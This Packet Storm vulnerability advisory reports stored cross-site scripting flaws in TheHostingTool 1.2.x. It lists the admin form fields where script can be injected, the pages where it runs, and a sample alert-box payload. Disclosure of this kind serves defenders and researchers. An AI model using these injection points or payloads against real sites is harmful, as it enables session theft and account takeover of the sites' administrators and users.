TheHostingTool 1.2.x Cross Site Scripting

2013-12-08T00:00:00
ID PACKETSTORM:124333
Type packetstorm
Reporter DevilScreaM
Modified 2013-12-08T00:00:00

Description

                                        
                                            `#Title : TheHostingTool 1.2.x Multiple Cross Site Scripting  
  
#Author : DevilScreaM  
  
#Date : 7 Desember 2013  
  
#Category : Web Applications  
  
#Vendor : http://thehostingtool.com/  
  
#Version : 1.2.x  
  
#Type : PHP  
  
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security  
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber  
  
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |  
  
#Tested : Mozila, Chrome, Opera -> Windows & Linux  
  
#Vulnerabillity : Cross Site Scripting  
  
  
POC & Exploit  
  
XSS 1  
  
http://127.0.0.1/admin/?page=servers&sub=add  
  
At Column "Name" input your XSS  
  
View Your XSS at   
  
http://127.0.0.1/admin/?page=servers&sub=view  
http://127.0.0.1/admin/?page=servers&sub=test  
  
  
XSS 2  
  
http://127.0.0.1/admin/?page=staff&sub=add  
  
At Column "Username" input your XSS  
  
View Your XSS At  
  
http://127.0.0.1/admin/?page=staff&sub=edit  
  
  
XSS 3  
  
1. Create Category at http://127.0.0.1/admin/?page=kb&sub=cat  
  
2. After Create Category, Create Article At http://127.0.0.1/admin/?page=kb&sub=art  
  
3. At Column "Name" or "Article Name" input your XSS  
  
Example <script>alert('DevilScreaM')</script>  
  
4. View Your XSS at  
  
http://127.0.0.1/support/  
`